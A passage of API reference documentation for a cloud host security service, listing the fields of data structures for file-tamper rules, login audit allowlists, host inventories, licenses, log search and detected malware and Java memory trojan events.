ExePid | Integer | Process PID |
TargetName | String | File name |
Reference | String | Reference link |
Level | Integer | Risk Level. 0: None; 1: High-Risk; 2: Medium-Risk; 3: Low-Risk |
ExeName | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
FileAction | String | File threat behavior Note: This field may return null, indicating that no valid values can be obtained. |
Core file monitoring rules
Used by actions: DescribeFileTamperEventRuleInfo, DescribeFileTamperRuleInfo, DescribeMachineFileTamperRules, ModifyFileTamperRule.
Name | Type | Required | Description |
---|---|---|---|
ProcessPath | String | Yes | Process path |
Target | String | Yes | Accessed file path |
Action | String | Yes | Recommended action: skip: skip; alarm: alert |
FileAction | String | No | Monitoring behavior Note: This field may return null, indicating that no valid values can be obtained. |
Information on Number of Host-associated Core File Rules
Used by actions: DescribeFileTamperRuleCount.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Count | Integer | Number of Association Rules |
Name | String | Name of the Association Rule (Show Only One of Them) Note: This field may return null, indicating that no valid values can be obtained. |
Core File Monitoring Rule Details
Used by actions: DescribeFileTamperEventRuleInfo, DescribeFileTamperRuleInfo.
Name | Type | Description |
---|---|---|
Name | String | Rule name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Update time |
CreateTime | String | Creation time |
Status | Integer | Status. 0: Enabled; 1: Disabled |
Rule | Array of FileTamperRule | Rule |
Uuids | Array of String | Effective Host UUID. Empty means all hosts, and returned number of entries can be controlled through parameters. Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Rule ID |
IsGlobal | Integer | Global Rule or Not (No by Default). 0: No; 1: Yes |
Level | Integer | Risk Level. 0: None; 1: High-Risk; 2: Medium-Risk; 3: Low-Risk |
UuidTotalCount | Integer | Total Number of Effective Hosts |
AddWhiteType | String | Allowlisted processing type Note: This field may return null, indicating that no valid values can be obtained. |
List of core file monitoring rules
Used by actions: DescribeFileTamperRules.
Name | Type | Description |
---|---|---|
Name | String | Rule name Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule Type. 0: System Rule; 1: User Rule |
HostCount | Integer | Number of affected hosts Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Update time |
CreateTime | String | Creation time |
Status | Integer | Status. 0: Enabled; 1: Disabled |
Id | Integer | Rule ID, which is set to 0 for system rules |
IsGlobal | Integer | Whether global. 0: no; 1: yes |
Level | Integer | Risk Level. 0: None; 1: High-Risk; 2: Medium-Risk; 3: Low-Risk |
WriteRuleCount | Integer | Number of write entries for the sub-rule Note: This field may return null, indicating that no valid values can be obtained. |
ReadRuleCount | Integer | Number of read entries for the sub-rule Note: This field may return null, indicating that no valid values can be obtained. |
ReadWriteRuleCount | Integer | Number of read and write entries for the sub-rule Note: This field may return null, indicating that no valid values can be obtained. |
FileAction | String | Monitoring behavior Note: This field may return null, indicating that no valid values can be obtained. |
AddWhiteType | String | Allowlisted processing type Note: This field may return null, indicating that no valid values can be obtained. |
Description of key-value pair filter, which is used for conditional filtering queries. For example, filter by ID, name, and status.
If there are multiple Filters, the logical relationship between them is AND.
If multiple values exist in one filter, the logical relationship between these values is OR.
Used by actions: DescribeAccountStatistics, DescribeAssetMachineList, DescribeAssetPortInfoList, DescribeAssetProcessInfoList, DescribeAssetSystemPackageList, DescribeAssetUserList, DescribeAssetWebAppList, DescribeAssetWebFrameList, DescribeAssetWebLocationList, DescribeAttackEvents, DescribeAttackLogs, DescribeAttackTop, DescribeAttackTrends, DescribeBanWhiteList, DescribeBaselineHostDetectList, DescribeBaselineItemDetectList, DescribeBaselineItemList, DescribeBaselinePolicyList, DescribeBaselineWeakPasswordList, DescribeBashEvents, DescribeBashEventsNew, DescribeBashPolicies, DescribeBashRules, DescribeBruteAttackList, DescribeComponentStatistics, DescribeExportMachines, DescribeHistoryAccounts, DescribeHostLoginList, DescribeIgnoreHostAndItemConfig, DescribeLicenseBindSchedule, DescribeLoginWhiteCombinedList, DescribeLoginWhiteList, DescribeMachineDefenseCnt, DescribeMachineRiskCnt, DescribeMachines, DescribeMachinesSimple, DescribeMalWareList, DescribeMalwareWhiteList, DescribeMalwareWhiteListAffectList, DescribeNetAttackWhiteList, DescribeOpenPortStatistics, DescribePrivilegeRules, DescribeProcessStatistics, DescribeReverseShellEvents, DescribeReverseShellRules, DescribeRiskDnsEventList, DescribeRiskDnsList, DescribeRiskDnsPolicyList, DescribeRiskProcessEvents, DescribeSecurityEventStat, DescribeVulDefenceEvent, DescribeVulDefenceList, DescribeVulDefencePluginDetail, DescribeVulDefencePluginStatus, DescribeVulEffectHostList, DescribeVulEffectModules, DescribeVulStoreList, DescribeWebHookPolicy, DescribeWebHookReceiver, DescribeWebHookRules, ExportAssetMachineList, ExportAssetPortInfoList, ExportAssetProcessInfoList, ExportAssetSystemPackageList, ExportAssetUserList, ExportAssetWebAppList, ExportAssetWebFrameList, ExportAssetWebLocationList, ExportBaselineFixList, ExportBaselineHostDetectList, ExportBaselineItemDetectList, ExportJavaMemShellPlugins, ExportJavaMemShells, ExportNonlocalLoginPlaces, ExportRiskDnsEventList, ExportRiskDnsPolicyList, ExportRiskProcessEvents, ExportVulDefenceEvent, ExportVulDefenceList, ExportVulDefencePluginEvent, ExportVulEffectHostList, ExportVulList, ModifyBaselinePolicy.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name of filter key |
Values | Array of String | Yes | One or more filter values |
ExactMatch | Boolean | No | Fuzzy search |
Description of key-value pair filter, which is used for conditional filtering queries. For example, filter by ID, name, and status.
If there are multiple Filters, the logical relationship between them is AND.
If there are multiple Values in the same Filter, the logical relationship between the Values under the same Filter is OR.
Used by actions: DescribeBaselineEffectHostList, DescribeBaselineList, DescribeCanNotSeparateMachine, DescribeEmergencyResponseList, DescribeEmergencyVulList, DescribeExpertServiceList, DescribeExpertServiceOrderList, DescribeFileTamperEvents, DescribeFileTamperRules, DescribeIgnoreRuleEffectHostList, DescribeJavaMemShellList, DescribeJavaMemShellPluginInfo, DescribeJavaMemShellPluginList, DescribeLicenseBindList, DescribeLicenseList, DescribeMachineClearHistory, DescribeMaliciousRequestWhiteList, DescribeRansomDefenseBackupList, DescribeRansomDefenseEventsList, DescribeRansomDefenseMachineList, DescribeRansomDefenseRollBackTaskList, DescribeRansomDefenseStrategyList, DescribeRansomDefenseStrategyMachines, DescribeScanState, DescribeScanTaskDetails, DescribeTags, DescribeVulList, ExportAttackEvents, ExportBaselineEffectHostList, ExportBaselineList, ExportBashEvents, ExportBashEventsNew, ExportBashPolicies, ExportBruteAttacks, ExportFileTamperEvents, ExportFileTamperRules, ExportIgnoreRuleEffectHostList, ExportLicenseDetail, ExportMaliciousRequests, ExportMalwares, ExportPrivilegeEvents, ExportRansomDefenseBackupList, ExportRansomDefenseEventsList, ExportRansomDefenseMachineList, ExportRansomDefenseStrategyList, ExportRansomDefenseStrategyMachines, ExportReverseShellEvents, ExportScanTaskDetails, ExportVulDetectionReport, ModifyEventAttackStatus, ModifyRiskEventsStatus.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name of filter key |
Values | Array of String | Yes | One or more filter values |
ExactMatch | Boolean | No | Whether to use fuzzy match. It will be handled by the front-end and can be ignored. |
Configuration for full-text index
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
CaseSensitive | Boolean | Whether case-sensitive |
Tokenizer | String | Delimiter |
ContainZH | Boolean | Whether Chinese characters are contained. |
Account change history data
Used by actions: DescribeHistoryAccounts.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
Uuid | String | CWPP client UUID |
MachineIp | String | Private IP address of the host |
MachineName | String | Host name |
Username | String | Username |
ModifyType | String | Account change type |
ModifyTime | Timestamp | Change time |
Host information entity of the log-in audit allowlist
Used by actions: DescribeLoginWhiteHostList.
Name | Type | Description |
---|---|---|
Quuid | String | Yunjing client ID |
Uuid | String | Host ID |
MachineName | String | Machine name |
MachineIp | String | Machine IP address. This parameter is left blank for terminated servers. |
MachineWanIp | String | Public IP address. This parameter is left blank for terminated servers. |
Tags | Array of MachineTag | Tag information array |
Add the host information entity of the log-in audit allowlist.
Used by actions: AddLoginWhiteLists, ModifyLoginWhiteRecord.
Name | Type | Required | Description |
---|---|---|---|
Quuid | String | Yes | Quuid |
Uuid | String | Yes | Uuid |
Log-in audit list entity
Used by actions: DescribeHostLoginList.
Name | Type | Description |
---|---|---|
Id | Integer | Record ID |
Uuid | String | UUID string Note: This field may return null, indicating that no valid values can be obtained. |
MachineIp | String | Host IP Note: This field may return null, indicating that no valid values can be obtained. |
MachineName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
UserName | String | Username Note: This field may return null, indicating that no valid values can be obtained. |
SrcIp | String | Source IP Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | 1: normal log-in; 2: cross-region log-in; 5: allowlisted; 14: processed; 15: ignored |
Country | Integer | Country/Region ID Note: This field may return null, indicating that no valid values can be obtained. |
City | Integer | City ID Note: This field may return null, indicating that no valid values can be obtained. |
Province | Integer | Province ID Note: This field may return null, indicating that no valid values can be obtained. |
LoginTime | String | Log-in time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Modification time Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskArea | Integer | Whether the cross-region log-in exception is hit: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskUser | Integer | Whether the abnormal user exception is hit: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskTime | Integer | Whether the abnormal time exception is hit: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
IsRiskSrcIp | Integer | Whether the abnormal IP exception is hit: 1: yes; 0: no Note: This field may return null, indicating that no valid values can be obtained. |
RiskLevel | Integer | Risk level: 0: high; 1: suspicious Note: This field may return null, indicating that no valid values can be obtained. |
Location | String | Location name Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Desc | String | High-risk information description: ABROAD - overseas IP; XTI - threat intelligence Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Port | Integer | Request destination port Note: This field may return null, indicating that no valid values can be obtained. |
Add log-in audit allowlist entity
Used by actions: AddLoginWhiteLists.
Name | Type | Required | Description |
---|---|---|---|
Places | Array of Place | Yes | Allowlisted region |
SrcIp | String | Yes | Allowlisted source IP address. IP ranges are supported. Multiple IPs are separated by commas. |
UserName | String | Yes | Allowlisted username separated by commas |
IsGlobal | Integer | Yes | Whether the allowlist is effective globally. 1: all hosts; 0: only a single host. |
HostInfos | Array of HostInfo | Yes | List of information on machines where the allowlist is effective |
Remark | String | No | Remarks |
StartTime | String | No | Start time |
EndTime | String | No | End time |
Host and host tag information
Used by actions: DescribeHostInfo.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
TagList | Array of String | Host tag name array Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host intranet IP Note: This field may return null, indicating that no valid values can be obtained. |
AliasName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
MachineWanIp | String | Host public IP address Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
KernelVersion | String | Kernel version number Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status: ONLINE; OFFLINE Note: This field may return null, indicating that no valid values can be obtained. |
ProtectType | String | Protection version: BASIC_VERSION - Basic Edition; PRO_VERSION - Professional Edition; Flagship - Ultimate Edition Note: This field may return null, indicating that no valid values can be obtained. |
VulNum | Integer | Number of vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tags | Cloud Tag Information Note: This field may return null, indicating that no valid values can be obtained. |
InstanceID | String | Host Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
Information on the ignored baseline check item
Used by actions: DescribeIgnoreBaselineRule.
Name | Type | Description |
---|---|---|
RuleName | String | Baseline check item name Note: This field may return null, indicating that no valid values can be obtained. |
RuleId | Integer | Baseline check item ID Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Update time Note: This field may return null, indicating that no valid values can be obtained. |
Fix | String | Fixing suggestions Note: This field may return null, indicating that no valid values can be obtained. |
EffectHostCount | Integer | Number of affected hosts Note: This field may return null, indicating that no valid values can be obtained. |
Information of hosts affected by ignoring detection items
Used by actions: DescribeIgnoreRuleEffectHostList.
Name | Type | Description |
---|---|---|
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Severity level: 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical Note: This field may return null, indicating that no valid values can be obtained. |
TagList | Array of String | Host tag array Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Status: 0: failed; 1: ignore; 3: passed; 5: detecting Note: This field may return null, indicating that no valid values can be obtained. |
LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
EventId | Integer | Event ID Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Event point information
Used by actions: DescribeAlarmIncidentNodes.
Name | Type | Description |
---|---|---|
IncidentId | String | Event ID Note: This field may return null, indicating that no valid values can be obtained. |
TableName | String | The name of the table where the event occurred Note: This field may return null, indicating that no valid values can be obtained. |
Vertex | Array of VertexInfo | A list of node information, with array items containing detailed node information Note: This field may return null, indicating that no valid values can be obtained. |
VertexCount | Integer | Total number of nodes Note: This field may return null, indicating that no valid values can be obtained. |
Java webshell event details
Used by actions: DescribeJavaMemShellInfo.
Name | Type | Description |
---|---|---|
InstanceName | String | Container name |
InstanceState | String | Instance Status: RUNNING, STOPPED, SHUTDOWN... |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP |
Type | Integer | Memory Trojan Type. 0: Filter Type; 1: Listener Type; 2: Servlet Type; 3: Interceptors Type; 4: Agent Type; 5: Other |
Description | String | Description |
CreateTime | String | First detection time |
RecentFoundTime | String | Last detection time |
Status | Integer | Processing Status. 0 - Pending; 1 - Allowlisted; 2 - Deleted; 3 - Ignored; 4 - Manually Processed |
ClassLoaderName | String | Java class loader name |
SuperClassName | String | Parent class name |
Md5 | String | Class file MD5 |
Interfaces | String | Implemented interfaces |
Annotations | String | Annotation |
Pid | Integer | Process ID |
Exe | String | Java Process Path |
Args | String | Java process command line parameters |
ClassName | String | Class name |
ClassContent | String | Java memory Trojan binary code (Base64) |
ClassContentPretty | String | Java Memory Trojan Decompilation Code |
EventDescription | String | Event description |
SecurityAdvice | String | Security advice |
MachineExtraInfo | MachineExtraInfo | Additional host information Note: This field may return null, indicating that no valid values can be obtained. |
MachineState | String | Instance status: RUNNING, STOPPED, SHUTDOWN... |
Java webshell event information
Used by actions: DescribeJavaMemShellList.
Name | Type | Description |
---|---|---|
Id | Integer | Event ID |
Alias | String | Server name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Server IP address Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | Memory Trojan Type. 0: Filter Type; 1: Listener Type; 2: Servlet Type; 3: Interceptors Type; 4: Agent Type; 5: Other |
Description | String | Description |
CreateTime | String | First detection time |
RecentFoundTime | String | Last detection time |
Status | Integer | Processing Status. 0 - Pending; 1 - Allowlisted; 2 - Deleted; 3 - Ignored; 4 - Manually Processed |
Quuid | String | Server QUUID |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Server UUID Note: This field may return null, indicating that no valid values can be obtained. |
Java Memory Trojan Plugin Information
Used by actions: DescribeJavaMemShellPluginInfo.
Name | Type | Description |
---|---|---|
Pid | Integer | Injection Process PID |
MainClass | String | Injection Process Main Class |
Status | Integer | Injection Status. 0: Injecting; 1: Injection Succeeded; 2: Plugin Timeout; 3: Plugin Exits; 4: Injection Failed; 5: Soft-delete |
ErrorLog | String | Error logs |
Java Memory Trojan Plugin Configuration
Used by actions: DescribeJavaMemShellPluginList.
Name | Type | Description |
---|---|---|
Quuid | String | Container QUUID |
Alias | String | Server name |
HostIp | String | Server IP address |
JavaShellStatus | Integer | Javashell Plugin Switch. 0: Off; 1: On |
Exception | Integer | Plugin Exception Status. 0: Normal; 1: Abnormal |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Uuid | String | Server UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Index key-value information
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
Key | String | Field requiring Key-Value or Meta Field Index configuration |
Value | ValueInfo | Field index description |
Key-value index configuration
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
CaseSensitive | Boolean | Whether case-sensitive |
KeyValues | Array of KeyValueArrayInfo | Information about the key-value pair to be indexed Note: This field may return null, indicating that no valid values can be obtained. |
Authorization binding details
Used by actions: DescribeLicenseBindList.
Name | Type | Description |
---|---|---|
MachineName | String | Machine Alias |
MachineWanIp | String | Machine Public IP address |
MachineIp | String | Machine Private IP address |
Quuid | String | CVM UUID |
Uuid | String | CWPP client UUID |
Tags | Array of String | Tag information |
AgentStatus | String | CWPP client status: OFFLINE, ONLINE, and UNINSTALL. |
IsUnBind | Boolean | Whether unbinding is allowed: false - unbinding is not allowed. |
IsSwitchBind | Boolean | Whether rebinding is allowed: false - rebinding is not allowed. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Authorization binding task details
Used by actions: DescribeLicenseBindSchedule.
Name | Type | Description |
---|---|---|
Quuid | String | CVM UUID |
ErrMsg | String | Error message |
Status | Integer | 0-in progress; 1-succeeded; 2-failed |
FixMessage | String | Fix suggestion |
MachineExtraInfo | MachineExtraInfo | Additional information of machine Note: This field may return null, indicating that no valid values can be obtained. |
Authorization order list object
Used by actions: DescribeLicenseList.
Name | Type | Description |
---|---|---|
LicenseId | Integer | Authorization ID |
LicenseType | Integer | Authorization type. 0: Pro Edition - pay-as-you-go; 1: Pro Edition - monthly subscription; 2: Ultimate Edition - monthly subscription. |
LicenseStatus | Integer | Authorization status. 0: not in use; 1: partially in use; 2: used up; 3: unavailable. Note: This field may return null, indicating that no valid values can be obtained. |
LicenseCnt | Integer | Total number of authorizations |
UsedLicenseCnt | Integer | Number of used authorizations |
OrderStatus | Integer | Order status. 1: normal; 2: isolated; 3: terminated. |
Deadline | String | Deadline |
ResourceId | String | Order resource ID |
AutoRenewFlag | Integer | 0: initialization; 1: automatic renewal; 2: no automatic renewal. |
ProjectId | Integer | Project ID |
TaskId | Integer | Task ID. Default value: 0. It is used to query the binding progress. |
BuyTime | String | Time of purchase |
SourceType | Integer | Whether the order is a trial order |
Alias | String | Resource alias |
Tags | Array of Tags | Platform Tag Note: This field may return null, indicating that no valid values can be obtained. |
FreezeNum | Integer | Number of frozen authorizations. 0: no authorization is frozen; other values: actual number of frozen authorizations. Note: This field may return null, indicating that no valid values can be obtained. |
Authorization Order Object Content
Used by actions: DescribeMachinesSimple.
Name | Type | Description |
---|---|---|
LicenseId | Integer | Authorization ID |
LicenseType | Integer | Authorization type |
Status | Integer | Authorization Order Resource Status |
SourceType | Integer | Order type |
ResourceId | String | Resource ID |
Result details of statistics within the histogram period
Used by actions: DescribeLogHistogram.
Name | Type | Description |
---|---|---|
Count | Integer | Number of logs within the statistical period |
TimeStamp | Integer | Unix timestamp rounded by period, in ms |
Log details
Used by actions: SearchLog.
Name | Type | Description |
---|---|---|
Content | String | JSON serialized string of the log content |
FileName | String | Log file name |
Source | String | Log source IP address |
TimeStamp | Integer | Log time, in milliseconds |
Record of stored log size
Used by actions: DescribeLogStorageRecord.
Name | Type | Description |
---|---|---|
Month | String | Year and month Note: This field may return null, indicating that no valid values can be obtained. |
UsedSize | Integer | Used storage capacity, in bytes Note: This field may return null, indicating that no valid values can be obtained. |
InquireSize | Integer | Total capacity, in bytes Note: This field may return null, indicating that no valid values can be obtained. |
Merged cross-region log-in allowlists
Used by actions: DescribeLoginWhiteCombinedList.
Name | Type | Description |
---|---|---|
Places | Array of Place | Allowlist region Note: This field may return null, indicating that no valid values can be obtained. |
UserName | String | Allowlisted users (Multiple users are separated by commas.) |
SrcIp | String | Allowlisted IPs (Multiple IPs are separated by commas.) |
Locale | String | Region string |
Remark | String | Remarks |
StartTime | String | Start time |
EndTime | String | End time |
IsGlobal | Integer | Whether the settings take effect globally. 1: take effect globally; 0: take effect on the specified host list. |
Name | String | Allowlist name. If IsLocal is set to 1, the name is fixed as All servers. If the allowlist applies to only a single server, the name is the server's private IP Address. If the allowlist applies to multiple servers, the name is the number of servers, such as 11. |
Desc | String | Return the server name when the allowlist applies to only one server. |
Id | Integer | Allowlist ID |
CreateTime | String | Creation time |
ModifyTime | String | Last modification time |
Uuid | String | Server UUID |
Locations | String | Login Location |
Cross-region log-in allowlist
Used by actions: DescribeLoginWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Record ID |
Uuid | String | Yunjing client ID |
Places | Array of Place | Allowlisted regions |
UserName | String | Allowlisted users (Multiple users are separated by commas.) |
SrcIp | String | Allowlisted IPs (Multiple IPs are separated by commas.) |
IsGlobal | Boolean | Whether a global rule |
CreateTime | Timestamp | Time of creating the allowlist |
ModifyTime | Timestamp | Time of modifying the allowlist |
MachineName | String | Machine name |
HostIp | String | Machine IP |
StartTime | String | Start time |
EndTime | String | End time |
Host list
Used by actions: DescribeMachines.
Name | Type | Description |
---|---|---|
MachineName | String | Host name. |
MachineOs | String | Host System. |
MachineStatus | String | Host status |
Uuid | String | Yunjing client UUID. If the client is offline for a long time, an empty string is returned. |
Quuid | String | CVM or BM Machine Unique UUID. |
VulNum | Integer | Number of vulnerabilities |
MachineIp | String | Host IP. |
IsProVersion | Boolean | Whether the edition is Pro Edition |
MachineWanIp | String | Public IP address of a host |
PayMode | String | Host status |
MalwareNum | Integer | Number of Trojans |
Tag | Array of MachineTag | Tag information |
BaselineNum | Integer | Number of baseline risks |
CyberAttackNum | Integer | Number of network risks |
SecurityStatus | String | Risk status |
InvasionNum | Integer | Number of intrusion events |
RegionInfo | RegionInfo | Region information |
InstanceState | String | Instance status: TERMINATED_PRO_VERSION - terminated |
LicenseStatus | Integer | Tamper-proof; authorization status: 1 - authorized; 0 - unauthorized |
ProjectId | Integer | Project ID |
HasAssetScan | Integer | Whether there is an available asset scanning API: 0 - no; 1 - yes |
MachineType | String | Machine Zone Type. CVM - Cloud Virtual Machine; BM: Bare Metal; ECM: Edge Computing Machine; LH: Lightweight Application Server; Other: Hybrid Cloud Zone |
KernelVersion | String | Kernel version |
ProtectType | String | Protection version: BASIC_VERSION - Basic Edition; PRO_VERSION - Professional Edition; Flagship - Ultimate Edition; GENERAL_DISCOUNT - Inclusive Edition |
CloudTags | Array of Tags | Cloud Tag Information Note: This field may return null, indicating that no valid values can be obtained. |
IsAddedOnTheFifteen | Integer | Whether a host added within the last 15 days: 0: no; 1: yes Note: This field may return null, indicating that no valid values can be obtained. |
IpList | String | Host IP List Note: This field may return null, indicating that no valid values can be obtained. |
VpcId | String | Network Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Instance ID |
Remark | String | Remarks Note: This field may return null, indicating that no valid values can be obtained. |
Machine Cleanup Record Object
Used by actions: DescribeMachineClearHistory.
Name | Type | Description |
---|---|---|
Id | Integer | ID Value |
InstanceId | String | Instance ID |
InstanceName | String | Instance name |
PublicIp | String | Public IP address |
PrivateIp | String | Private IP address |
AgentLastOfflineTime | String | Client Last Offline Time |
CreateTime | String | Creation time |
Server Basic Information
Used by actions: DescribeAssetAppList, DescribeAssetCoreModuleList, DescribeAssetDatabaseList, DescribeAssetEnvList, DescribeAssetInitServiceList, DescribeAssetJarList, DescribeAssetMachineDetail, DescribeAssetMachineList, DescribeAssetPlanTaskList, DescribeAssetPortInfoList, DescribeAssetProcessInfoList, DescribeAssetSystemPackageList, DescribeAssetUserList, DescribeAssetWebAppList, DescribeAssetWebFrameList, DescribeAssetWebLocationList, DescribeAssetWebServiceInfoList, DescribeAttackEventInfo, DescribeAttackEvents, DescribeAttackLogs, DescribeBaselineHostDetectList, DescribeBaselineItemList, DescribeBashEventsNew, DescribeBruteAttackList, DescribeDefenceEventDetail, DescribeFileTamperEvents, DescribeHostLoginList, DescribeIgnoreHostAndItemConfig, DescribeJavaMemShellInfo, DescribeJavaMemShellList, DescribeJavaMemShellPluginList, DescribeLicenseBindList, DescribeLicenseBindSchedule, DescribeMachines, DescribeMalWareList, DescribeMalwareInfo, DescribeReverseShellEvents, DescribeRiskDnsEventInfo, DescribeRiskDnsEventList, DescribeRiskProcessEvents, DescribeScanTaskDetails, DescribeScreenMachines, DescribeVulDefenceEvent, DescribeVulEffectHostList.
Name | Type | Description |
---|---|---|
WanIP | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
PrivateIP | String | Private IP address Note: This field may return null, indicating that no valid values can be obtained. |
NetworkType | Integer | Network Type. 1: VPC network; 2: Basic Network; 3: Non-Tencent Cloud Network Note: This field may return null, indicating that no valid values can be obtained. |
NetworkName | String | Network Name, returns vpc_id in the case of a VPC network Note: This field may return null, indicating that no valid values can be obtained. |
InstanceID | String | Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
Query Details of Host-related Core File Monitoring Rules
Used by actions: DescribeMachineFileTamperRules.
Name | Type | Description |
---|---|---|
Name | String | Rule name Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule Type. 0: System Rule; 1: User Rule |
Rule | Array of FileTamperRule | Rule |
Id | Integer | Unique ID |
Information on the authorization bound to the machine
Used by actions: DescribeMachineLicenseDetail.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID |
PayMode | Integer | xx |
ResourceId | String | xxx |
InquireKey | String | xxx |
SourceType | Integer | xxx |
Host List Shuttle Box
Used by actions: DescribeMachinesSimple.
Name | Type | Description |
---|---|---|
MachineName | String | Host name. |
MachineOs | String | Host System. |
Uuid | String | Yunjing client UUID. If the client is offline for a long time, an empty string is returned. |
Quuid | String | CVM or BM Machine Unique UUID. |
MachineIp | String | Host IP. |
IsProVersion | Boolean | Whether the edition is Pro Edition |
MachineWanIp | String | Public IP address of the host |
PayMode | String | Host status |
Tag | Array of MachineTag | Tag information |
RegionInfo | RegionInfo | Region information |
InstanceState | String | Instance status. TERMINATED_PRO_VERSION: terminated. |
ProjectId | Integer | Project ID |
MachineType | String | Machine Zone Type. CVM - Cloud Virtual Machine; BM: Bare Metal; ECM: Edge Computing Machine; LH: Lightweight Application Server; Other: Hybrid Cloud Zone |
KernelVersion | String | Kernel version |
ProtectType | String | Protection Edition. BASIC_VERSION: Basic Edition; PRO_VERSION: Professional Edition; Flagship: Premium Edition; GENERAL_DISCOUNT: General Discount Edition |
LicenseOrder | LicenseOrder | Authorization order object Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tags | Cloud Tag Information Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
Machine snapshot information
Used by actions: DescribeMachineSnapshot.
Name | Type | Description |
---|---|---|
Quuid | String | CVM ID |
HostName | String | Host name |
HostIp | String | Host IP address |
SnapshotName | String | Snapshot name |
CreateTime | String | Snapshot creation time |
DiskId | String | Disk ID |
InstanceId | String | Instance ID |
RegionId | Integer | Region ID |
SnapshotId | String | Snapshot ID |
Server tag information
Used by actions: DescribeAssetAppList, DescribeAssetDatabaseList, DescribeAssetMachineList, DescribeAssetPortInfoList, DescribeAssetProcessInfoList, DescribeAssetWebAppList, DescribeAssetWebFrameList, DescribeAssetWebLocationList, DescribeAssetWebServiceInfoList, DescribeLoginWhiteHostList, DescribeMachines, DescribeMachinesSimple, DescribeRansomDefenseMachineList, DescribeRansomDefenseStrategyMachines.
Name | Type | Description |
---|---|---|
Rid | Integer | Associated tag ID |
Name | String | Tag name |
TagId | Integer | Tag ID |
Trojan list
Used by actions: DescribeMalWareList.
Name | Type | Description |
---|---|---|
HostIp | String | Server IP address |
Uuid | String | UUID |
FilePath | String | Path |
VirusName | String | Description |
Status | Integer | Status: 4-Pending, 5-Trusted, 6-Isolated, 8-Files Deleted, 14-Processed. |
Id | Integer | Unique ID Note: This field may return null, indicating that no valid values can be obtained. |
Alias | String | Host alias |
Tags | Array of String | Feature tag. This field has been deprecated, and no tag will be returned. Tags are returned in the details. Note: This field may return null, indicating that no valid values can be obtained. |
FileCreateTime | String | First running time Note: This field may return null, indicating that no valid values can be obtained. |
FileModifierTime | String | Last running time Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Creation time |
LatestScanTime | String | Last scan time |
Level | Integer | Risk level. 0: unknown; 1: low; 2: medium; 3: high; 4: critical. |
CheckPlatform | String | Trojan detection platforms, separated with commas. 1: cloud security engine; 2: TAV; 3: BinaryAI; 4: abnormal behavior; 5: threat intelligence. |
ProcessExists | Integer | Whether the Trojan process exists. 0: no; 1: yes. |
FileExists | Integer | Whether the Trojan file exists. 0: no; 1: yes. |
Quuid | String | CVM QUUID |
MD5 | String | Trojan sample MD5 |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Malicious request allowlist information
Used by actions: DescribeMaliciousRequestWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Allowlist ID |
